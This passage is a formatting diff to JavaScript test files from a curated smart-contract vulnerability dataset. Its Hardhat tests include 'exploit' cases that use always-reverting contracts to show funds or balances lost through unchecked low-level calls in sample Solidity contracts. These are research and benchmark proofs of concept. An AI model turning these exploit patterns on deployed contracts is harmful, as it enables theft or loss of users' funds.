JSON.parse(fs.readFileSync(siringPath)); - const SiringClockAuction = await ethers.getContractFactory(siringJson.abi, siringJson.bytecode); - const siringAuction = await SiringClockAuction.connect(owner).deploy(contract.target, 10); + const SiringClockAuction = await ethers.getContractFactory( + siringJson.abi, + siringJson.bytecode, + ); + const siringAuction = await SiringClockAuction.connect(owner).deploy( + contract.target, + 10, + ); await setBalance(siringAuction.target, amount); - return {pandaCaller, contract, saleAuction, siringAuction, nft, nftSuccess, saleAuctionSuccess, pandaCallerSuccess} - }; - - it('sanity check: unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol in function withdrawAuctionBalances()', async function () { - const {contract, saleAuctionSuccess, siringAuction} = await loadFixture(deployContracts); - await expect(saleAuctionSuccess.connect(owner).transferOwnership(contract.target)).not.be.reverted; + return { + pandaCaller, + contract, + saleAuction, + siringAuction, + nft, + nftSuccess, + saleAuctionSuccess, + pandaCallerSuccess, + }; + } + + it("sanity check: unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol in function withdrawAuctionBalances()", async function () { + const { contract, saleAuctionSuccess, siringAuction } = + await loadFixture(deployContracts); + await expect( + saleAuctionSuccess.connect(owner).transferOwnership(contract.target), + ).not.be.reverted; - expect(await ethers.provider.getBalance(saleAuctionSuccess.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal(amount); + expect( + await ethers.provider.getBalance(saleAuctionSuccess.target), + ).to.be.equal(amount); + expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal( + amount, + ); await contract.connect(owner).setSiringAuctionAddress(siringAuction.target); - await contract.connect(owner).setSaleAuctionAddress(saleAuctionSuccess.target); - - await expect(contract.connect(owner).withdrawAuctionBalances()).to.not.be.reverted; - - expect(await ethers.provider.getBalance(saleAuctionSuccess.target)).to.be.equal(0); - expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal(0); - + await contract + .connect(owner) + .setSaleAuctionAddress(saleAuctionSuccess.target); + + await expect(contract.connect(owner).withdrawAuctionBalances()).to.not.be + .reverted; + + expect( + await ethers.provider.getBalance(saleAuctionSuccess.target), + ).to.be.equal(0); + expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal( + 0, + ); }); it("sanity check: unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol in function giveBirth()", async function () { - const {pandaCallerSuccess, contract, saleAuction, siringAuction} = await loadFixture(deployContracts); + const { pandaCallerSuccess, contract, saleAuction, siringAuction } = + await loadFixture(deployContracts); await contract.connect(owner).setCFO(pandaCallerSuccess.target); await contract.connect(owner).setSiringAuctionAddress(siringAuction.target); await contract.connect(owner).setSaleAuctionAddress(saleAuction.target); - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(pandaCallerSuccess.target)).to.be.equal(0); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); + expect( + await ethers.provider.getBalance(pandaCallerSuccess.target), + ).to.be.equal(0); await expect(pandaCallerSuccess.withdraw()).to.not.be.reverted; - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(ethers.parseEther("0.002")); - expect(await ethers.provider.getBalance(pandaCallerSuccess.target)).to.be.equal(ethers.parseEther("0.998")); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + ethers.parseEther("0.002"), + ); + expect( + await ethers.provider.getBalance(pandaCallerSuccess.target), + ).to.be.equal(ethers.parseEther("0.998")); await contract.connect(owner).init(); await contract.connect(owner).unpause(); - await contract.connect(owner).createWizzPanda([1,1], 0, owner.address); - await contract.connect(owner).createWizzPanda([2,2], 0, owner.address); - - await contract.connect(owner).breedWithAuto(2, 1, {value: amount}); + await contract.connect(owner).createWizzPanda([1, 1], 0, owner.address); + await contract.connect(owner).createWizzPanda([2, 2], 0, owner.address); + await contract.connect(owner).breedWithAuto(2, 1, { value: amount }); await mine(10000); - await expect(pandaCallerSuccess.call(2, [3,3], [100,0])) - .to.emit(contract, "Birth") - .withArgs(owner.address, 3, 2, 1, [3,3]); + await expect(pandaCallerSuccess.call(2, [3, 3], [100, 0])) + .to.emit(contract, "Birth") + .withArgs(owner.address, 3, 2, 1, [3, 3]); // caller does not get the reward - expect(await ethers.provider.getBalance(pandaCallerSuccess.target)).to.be.equal(amount); - + expect( + await ethers.provider.getBalance(pandaCallerSuccess.target), + ).to.be.equal(amount); }); it("exploit unchecked low level call vulnerability in function withdrawAuctionBalances()", async function () { - const {pandaCaller, contract, saleAuction, siringAuction, nft} = await loadFixture(deployContracts); + const { pandaCaller, contract, saleAuction, siringAuction, nft } = + await loadFixture(deployContracts); await expect( owner.sendTransaction({ to: nft.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); await saleAuction.connect(owner).transferOwnership(contract.target); - expect(await ethers.provider.getBalance(saleAuction.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(saleAuction.target)).to.be.equal( + amount, + ); + expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal( + amount, + ); await contract.connect(owner).setSiringAuctionAddress(siringAuction.target); await contract.connect(owner).setSaleAuctionAddress(saleAuction.target); - await expect(contract.connect(owner).withdrawAuctionBalances()).to.not.be.reverted; - - expect(await ethers.provider.getBalance(saleAuction.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal(0); + await expect(contract.connect(owner).withdrawAuctionBalances()).to.not.be + .reverted; + expect(await ethers.provider.getBalance(saleAuction.target)).to.be.equal( + amount, + ); + expect(await ethers.provider.getBalance(siringAuction.target)).to.be.equal( + 0, + ); }); - it("exploit unchecked low level call vulnerability in function giveBirth()", async function () { - const {pandaCaller, contract, saleAuction, siringAuction, nft} = await loadFixture(deployContracts); + const { pandaCaller, contract, saleAuction, siringAuction, nft } = + await loadFixture(deployContracts); await contract.connect(owner).setSiringAuctionAddress(siringAuction.target); await contract.connect(owner).setSaleAuctionAddress(saleAuction.target); - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); expect(await ethers.provider.getBalance(pandaCaller.target)).to.be.equal(0); await expect( owner.sendTransaction({ to: pandaCaller.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); await expect(pandaCaller.withdraw()).to.not.be.reverted; - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); expect(await ethers.provider.getBalance(pandaCaller.target)).to.be.equal(0); await contract.connect(owner).init(); await contract.connect(owner).unpause(); - await contract.connect(owner).createWizzPanda([1,1], 0, owner.address); - await contract.connect(owner).createWizzPanda([2,2], 0, owner.address); - - await contract.connect(owner).breedWithAuto(2, 1, {value: amount}); + await contract.connect(owner).createWizzPanda([1, 1], 0, owner.address); + await contract.connect(owner).createWizzPanda([2, 2], 0, owner.address); + await contract.connect(owner).breedWithAuto(2, 1, { value: amount }); await mine(10000); // giveBirth function ends even when the call to the external contract fails - await expect(pandaCaller.call(2, [3,3], [100,0])) - .to.emit(contract, "Birth") - .withArgs(owner.address, 3, 2, 1, [3,3]); + await expect(pandaCaller.call(2, [3, 3], [100, 0])) + .to.emit(contract, "Birth") + .withArgs(owner.address, 3, 2, 1, [3, 3]); // caller does not get the reward expect(await ethers.provider.getBalance(pandaCaller.target)).to.be.equal(0); - }); - - }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js index 1ff6a87..3652cc7 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js @@ -1,84 +1,113 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol", function () { - let owner, amount; async function deployContracts() { amount = ethers.parseEther("0.01"); [owner] = await ethers.getSigners(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol/PoCGame.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol/PoCGame.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const PoCGame = await ethers.getContractFactory(json.abi, json.bytecode); - const contract = await PoCGame.connect(owner).deploy(revertContract.target, amount); + const contract = await PoCGame.connect(owner).deploy( + revertContract.target, + amount, + ); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.deploy(); - const successPoC = await PoCGame.connect(owner).deploy(successContract.target, amount); + const successPoC = await PoCGame.connect(owner).deploy( + successContract.target, + amount, + ); - return {contract, revertContract, successPoC, successContract} - }; + return { contract, revertContract, successPoC, successContract }; + } - it('sanity check: unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol', async function () { - const {successPoC, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol", async function () { + const { successPoC, successContract } = await loadFixture(deployContracts); const donatedValue = await ethers.provider.getStorage(successPoC.target, 8); expect(Number(donatedValue)).to.be.equal(0); await expect(successPoC.connect(owner).AdjustDifficulty(amount)) - .to.emit(successPoC, "DifficultyChanged") - .withArgs(amount); + .to.emit(successPoC, "DifficultyChanged") + .withArgs(amount); await successPoC.connect(owner).OpenToThePublic(); - await expect(successPoC.connect(owner).wager({value: amount})) - .to.emit(successPoC, "Wager") - .withArgs(amount, owner.address); - - expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal(amount); + await expect(successPoC.connect(owner).wager({ value: amount })) + .to.emit(successPoC, "Wager") + .withArgs(amount, owner.address); + + expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal( + amount, + ); await expect(successPoC.connect(owner).play()) - .to.emit(successPoC, "Lose") - .withArgs(amount/BigInt(2), owner.address); - - expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal(amount/BigInt(2)); - expect(await ethers.provider.getBalance(successContract.target)).to.be.equal(amount/BigInt(2)); - const donatedValueAfter = await ethers.provider.getStorage(successPoC.target, 8); - expect(Number(donatedValueAfter)).to.be.equal(amount/BigInt(2)); + .to.emit(successPoC, "Lose") + .withArgs(amount / BigInt(2), owner.address); + + expect(await ethers.provider.getBalance(successPoC.target)).to.be.equal( + amount / BigInt(2), + ); + expect( + await ethers.provider.getBalance(successContract.target), + ).to.be.equal(amount / BigInt(2)); + const donatedValueAfter = await ethers.provider.getStorage( + successPoC.target, + 8, + ); + expect(Number(donatedValueAfter)).to.be.equal(amount / BigInt(2)); }); it("exploit unchecked low level call vulnerability", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await expect( owner.sendTransaction({ to: revertContract.target, value: amount, - }) + }), ).to.be.revertedWith("I always revert!"); const donatedValue = await ethers.provider.getStorage(contract.target, 8); expect(Number(donatedValue)).to.be.equal(0); await expect(contract.connect(owner).AdjustDifficulty(amount)) - .to.emit(contract, "DifficultyChanged") - .withArgs(amount); + .to.emit(contract, "DifficultyChanged") + .withArgs(amount); await contract.connect(owner).OpenToThePublic(); - await expect(contract.connect(owner).wager({value: amount})) - .to.emit(contract, "Wager") - .withArgs(amount, owner.address); - - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); + await expect(contract.connect(owner).wager({ value: amount })) + .to.emit(contract, "Wager") + .withArgs(amount, owner.address); + + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); await expect(contract.connect(owner).play()) - .to.emit(contract, "Lose") - .withArgs(amount/BigInt(2), owner.address); - - expect(await ethers.provider.getBalance(contract.target)).to.be.equal(amount); - expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal(0); - const donatedValueAfter = await ethers.provider.getStorage(contract.target, 8); - expect(Number(donatedValueAfter)).to.be.equal(amount/BigInt(2)); + .to.emit(contract, "Lose") + .withArgs(amount / BigInt(2), owner.address); + expect(await ethers.provider.getBalance(contract.target)).to.be.equal( + amount, + ); + expect(await ethers.provider.getBalance(revertContract.target)).to.be.equal( + 0, + ); + const donatedValueAfter = await ethers.provider.getStorage( + contract.target, + 8, + ); + expect(Number(donatedValueAfter)).to.be.equal(amount / BigInt(2)); }); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js index 81b3d62..3572d1e 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js @@ -1,5 +1,5 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); @@ -7,22 +7,29 @@ describe("attack unchecked_low_level_calls/unchecked_return_value.sol", function let owner; async function deployContracts() { [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol/TownCrier.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol/TownCrier.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const TownCrier = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await TownCrier.connect(owner).deploy(); - const TownCrierCaller = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol:TownCrierCaller"); + const TownCrierCaller = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol:TownCrierCaller", + ); const caller = await TownCrierCaller.deploy(contract.target); - const TownCrierCallerBenign = await ethers.getContractFactory("contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol:TownCrierCaller"); + const TownCrierCallerBenign = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol:TownCrierCaller", + ); const successCaller = await TownCrierCallerBenign.deploy(contract.target); - return {contract, caller, successCaller} - }; + return { contract, caller, successCaller }; + } - it('sanity check: unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol in line 180', async function () { - const {contract, successCaller} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol in line 180", async function () { + const { contract, successCaller } = await loadFixture(deployContracts); const SGX_ADDRESS = "0x18513702cCd928F2A3eb63d900aDf03c9cc81593"; await network.provider.request({ method: "hardhat_impersonateAccount", @@ -34,33 +41,41 @@ describe("attack unchecked_low_level_calls/unchecked_return_value.sol", function to: SGX_ADDRESS, value: ethers.parseEther("10"), }); - + const requestType = 1; - - const requestData = [ - ethers.encodeBytes32String("data") - ]; - - await expect(owner.sendTransaction({to: successCaller.target, value: 1})).to.not.be.reverted; + + const requestData = [ethers.encodeBytes32String("data")]; + + await expect(owner.sendTransaction({ to: successCaller.target, value: 1 })) + .to.not.be.reverted; const amount = ethers.parseEther("1"); - const tx = successCaller.request(requestType, requestData, {value: amount}); - await expect(successCaller.request(requestType, requestData, {value: amount})) - .to.emit(contract, "RequestInfo"); + const tx = successCaller.request(requestType, requestData, { + value: amount, + }); + await expect( + successCaller.request(requestType, requestData, { value: amount }), + ).to.emit(contract, "RequestInfo"); let fee = await contract.requests(1); expect(fee[1]).to.be.equal(amount); const paramsHash = successCaller.hash(); - await expect(contract.connect(SGX_sign).deliver(1, paramsHash, 3, ethers.encodeBytes32String("data"))) - .to.emit(contract, "DeliverInfo").to.emit(successCaller, "LogResponse").to.emit(successCaller, "Received"); - + await expect( + contract + .connect(SGX_sign) + .deliver(1, paramsHash, 3, ethers.encodeBytes32String("data")), + ) + .to.emit(contract, "DeliverInfo") + .to.emit(successCaller, "LogResponse") + .to.emit(successCaller, "Received"); + fee = await contract.requests(1); expect(fee[1]).to.be.equal(0); }); it("sanity check: unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol in line 192", async function () { - const {contract, successCaller} = await loadFixture(deployContracts); + const { contract, successCaller } = await loadFixture(deployContracts); const SGX_ADDRESS = "0x18513702cCd928F2A3eb63d900aDf03c9cc81593"; await network.provider.request({ method: "hardhat_impersonateAccount", @@ -72,33 +87,40 @@ describe("attack unchecked_low_level_calls/unchecked_return_value.sol", function to: SGX_ADDRESS, value: ethers.parseEther("10"), }); - + const requestType = 1; - - const requestData = [ - ethers.encodeBytes32String("data") - ]; - - await expect(successCaller.response(1,1,requestData[0])).to.not.be.reverted; + + const requestData = [ethers.encodeBytes32String("data")]; + + await expect(successCaller.response(1, 1, requestData[0])).to.not.be + .reverted; const amount = ethers.parseEther("1"); - const tx = successCaller.request(requestType, requestData, {value: amount}); - await expect(successCaller.request(requestType, requestData, {value: amount})) - .to.emit(contract, "RequestInfo"); + const tx = successCaller.request(requestType, requestData, { + value: amount, + }); + await expect( + successCaller.request(requestType, requestData, { value: amount }), + ).to.emit(contract, "RequestInfo"); let fee = await contract.requests(1); expect(fee[1]).to.be.equal(amount); const paramsHash = successCaller.hash(); - await expect(contract.connect(SGX_sign).deliver(1, paramsHash, 0, ethers.encodeBytes32String("data"))) - .to.emit(contract, "DeliverInfo").to.emit(successCaller, "LogResponse"); - + await expect( + contract + .connect(SGX_sign) + .deliver(1, paramsHash, 0, ethers.encodeBytes32String("data")), + ) + .to.emit(contract, "DeliverInfo") + .to.emit(successCaller, "LogResponse"); + fee = await contract.requests(1); expect(fee[1]).to.be.equal(0); }); it("exploit unchecked low level call vulnerability in line 192", async function () { - const {contract, caller} = await loadFixture(deployContracts); + const { contract, caller } = await loadFixture(deployContracts); const SGX_ADDRESS = "0x18513702cCd928F2A3eb63d900aDf03c9cc81593"; await network.provider.request({ method: "hardhat_impersonateAccount", @@ -110,33 +132,35 @@ describe("attack unchecked_low_level_calls/unchecked_return_value.sol", function to: SGX_ADDRESS, value: ethers.parseEther("10"), }); - + const requestType = 1; - - const requestData = [ - ethers.encodeBytes32String("data") - ]; - - await expect(caller.response(1,1,requestData[0])).to.be.reverted; + + const requestData = [ethers.encodeBytes32String("data")]; + + await expect(caller.response(1, 1, requestData[0])).to.be.reverted; const amount = ethers.parseEther("1"); - const tx = caller.request(requestType, requestData, {value: amount}); - await expect(caller.request(requestType, requestData, {value: amount})) - .to.emit(contract, "RequestInfo"); + const tx = caller.request(requestType, requestData, { value: amount }); + await expect( + caller.request(requestType, requestData, { value: amount }), + ).to.emit(contract, "RequestInfo"); let fee = await contract.requests(1); expect(fee[1]).to.be.equal(amount); const paramsHash = caller.hash(); - await expect(contract.connect(SGX_sign).deliver(1, paramsHash, 0, ethers.encodeBytes32String("data"))) - .to.emit(contract, "DeliverInfo"); - + await expect( + contract + .connect(SGX_sign) + .deliver(1, paramsHash, 0, ethers.encodeBytes32String("data")), + ).to.emit(contract, "DeliverInfo"); + fee = await contract.requests(1); expect(fee[1]).to.be.equal(0); }); it("exploit unchecked low level call vulnerability in line 180", async function () { - const {contract, caller} = await loadFixture(deployContracts); + const { contract, caller } = await loadFixture(deployContracts); const SGX_ADDRESS = "0x18513702cCd928F2A3eb63d900aDf03c9cc81593"; await network.provider.request({ method: "hardhat_impersonateAccount", @@ -148,27 +172,30 @@ describe("attack unchecked_low_level_calls/unchecked_return_value.sol", function to: SGX_ADDRESS, value: ethers.parseEther("10"), }); - + const requestType = 1; - - const requestData = [ - ethers.encodeBytes32String("data") - ]; - - await expect(owner.sendTransaction({to: caller.target, value: 1})).to.be.reverted; + + const requestData = [ethers.encodeBytes32String("data")]; + + await expect(owner.sendTransaction({ to: caller.target, value: 1 })).to.be + .reverted; const amount = ethers.parseEther("1"); - const tx = caller.request(requestType, requestData, {value: amount}); - await expect(caller.request(requestType, requestData, {value: amount})) - .to.emit(contract, "RequestInfo"); + const tx = caller.request(requestType, requestData, { value: amount }); + await expect( + caller.request(requestType, requestData, { value: amount }), + ).to.emit(contract, "RequestInfo"); let fee = await contract.requests(1); expect(fee[1]).to.be.equal(amount); const paramsHash = caller.hash(); - await expect(contract.connect(SGX_sign).deliver(1, paramsHash, 3, ethers.encodeBytes32String("data"))) - .to.emit(contract, "DeliverInfo"); - + await expect( + contract + .connect(SGX_sign) + .deliver(1, paramsHash, 3, ethers.encodeBytes32String("data")), + ).to.emit(contract, "DeliverInfo"); + fee = await contract.requests(1); expect(fee[1]).to.be.equal(0); }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js index 48bb6d6..2cf4fe4 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js @@ -1,5 +1,5 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); @@ -7,47 +7,66 @@ describe("attack unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e0 let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol/TokenBank.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol/TokenBank.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const TokenBank = await ethers.getContractFactory(json.abi, json.bytecode); const contract = await TokenBank.connect(owner).deploy(); - const RevertContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract"); + const RevertContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/revert_contract.sol:RevertContract", + ); const revertContract = await RevertContract.deploy(); - const SuccessContract = await ethers.getContractFactory("contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract"); + const SuccessContract = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/success_contract.sol:SuccessContract", + ); const successContract = await SuccessContract.connect(owner).deploy(); - return {contract, revertContract, successContract} - }; + return { contract, revertContract, successContract }; + } - it('sanity check: unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol in WithdrawToken()', async function () { - const {contract, successContract} = await loadFixture(deployContracts); + it("sanity check: unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol in WithdrawToken()", async function () { + const { contract, successContract } = await loadFixture(deployContracts); await expect(contract.connect(owner).initTokenBank()).to.not.be.reverted; const amount = ethers.parseEther("2"); - await expect(successContract.connect(owner).transfer(contract.target, amount)).to.not.be.reverted; + await expect( + successContract.connect(owner).transfer(contract.target, amount), + ).to.not.be.reverted; expect(await successContract.balanceOf(contract.target)).to.equal(amount); - await expect(owner.sendTransaction({ + await expect( + owner.sendTransaction({ to: contract.target, value: amount, - })).to.not.be.reverted; + }), + ).to.not.be.reverted; expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await expect(contract.WitdrawTokenToHolder(owner.address, successContract.target, amount)).to.not.be.reverted; + await expect( + contract.WitdrawTokenToHolder( + owner.address, + successContract.target, + amount, + ), + ).to.not.be.reverted; expect(await contract.Holders(owner.address)).to.equal(0); - expect(await successContract.balanceOf(owner.address)).to.equal(ethers.parseEther("10")); + expect(await successContract.balanceOf(owner.address)).to.equal( + ethers.parseEther("10"), + ); expect(await successContract.balanceOf(successContract.target)).to.equal(0); }); it("exploit unchecked low level call vulnerability in WithdrawToken()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -59,14 +78,14 @@ describe("attack unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e0 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); // Signer deposits ether to become a holder await sig.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); expect(await ethers.provider.getBalance(contract.target)).to.equal(amount); @@ -75,15 +94,18 @@ describe("attack unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e0 expect(await contract.Holders(sig.address)).to.equal(amount); // signer puts the wrong address in the withdraw function - await contract.WitdrawTokenToHolder(sig.address, revertContract.target, amount); + await contract.WitdrawTokenToHolder( + sig.address, + revertContract.target, + amount, + ); //signer no longer holds tokens but the tokens were never transferred expect(await contract.Holders(sig.address)).to.equal(0); - }); it("exploit unchecked low level call vulnerability in WithdrawToHolder()", async function () { - const {contract, revertContract} = await loadFixture(deployContracts); + const { contract, revertContract } = await loadFixture(deployContracts); await contract.connect(owner).initTokenBank(); @@ -95,36 +117,42 @@ describe("attack unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e0 sig.sendTransaction({ to: revertContract.target, value: oneEther, - }) + }), ).to.be.revertedWith("I always revert!"); const amount = ethers.parseEther("2"); - await revertContract.connect(sig).sendEther(contract.target, {value: amount}); + await revertContract + .connect(sig) + .sendEther(contract.target, { value: amount }); await owner.sendTransaction({ - to: contract.target, - value: amount, + to: contract.target, + value: amount, }); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); expect(await contract.Holders(revertContract.target)).to.equal(amount); expect(await contract.Holders(owner.address)).to.equal(amount); - await contract.connect(owner).WithdrawToHolder(revertContract.target, amount); + await contract + .connect(owner) + .WithdrawToHolder(revertContract.target, amount); expect(await contract.Holders(owner.address)).to.equal(amount); expect(await contract.Holders(revertContract.target)).to.equal(0); - - const revertBalance = await ethers.provider.getBalance(revertContract.target); + const revertBalance = await ethers.provider.getBalance( + revertContract.target, + ); expect(revertBalance).to.equal(0); - expect(await ethers.provider.getBalance(contract.target)).to.equal(amount + amount); - + expect(await ethers.provider.getBalance(contract.target)).to.equal( + amount + amount, + ); }); - - }); diff --git a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js index 279b5f7..a9d8fed 100644 --- a/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js +++ b/smartbugs-curated/0.4.x/test/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js @@ -1,35 +1,51 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); describe("attack unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol", function () { - let owner, sig; + let owner, sig; async function deployContracts() { [owner, sig] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol/AirDropContract.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol/AirDropContract.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); - const AirDropContract = await ethers.getContractFactory(json.abi, json.bytecode); + const AirDropContract = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); const contract = await AirDropContract.deploy(); - const TokenEBU = await ethers.getContractFactory("contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU"); + const TokenEBU = await ethers.getContractFactory( + "contracts/unchecked_low_level_calls/TokenEBU.sol:TokenEBU", + ); const token = await TokenEBU.connect(owner).deploy(1, 